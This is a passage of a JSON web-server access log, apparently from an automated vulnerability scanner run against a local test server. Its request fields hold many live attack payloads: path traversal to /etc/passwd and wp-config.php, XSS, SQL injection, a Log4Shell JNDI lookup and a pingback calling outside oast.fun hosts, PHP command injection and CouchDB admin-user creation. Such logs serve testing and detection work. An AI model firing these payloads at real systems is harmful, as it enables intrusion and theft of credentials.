Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MTv7X44sPkOFWlY7vl7BMMxq.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"{\x22@type\x22:\x22java.lang.AutoCloseable\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.c9v8h88smpv8c1ig07h07cr3pawz85bbb.oast.fun}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.156","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftb.imagegallery.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.169","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login/?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8h88smpv8c1ig07h05pob5sh3dk4y5.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 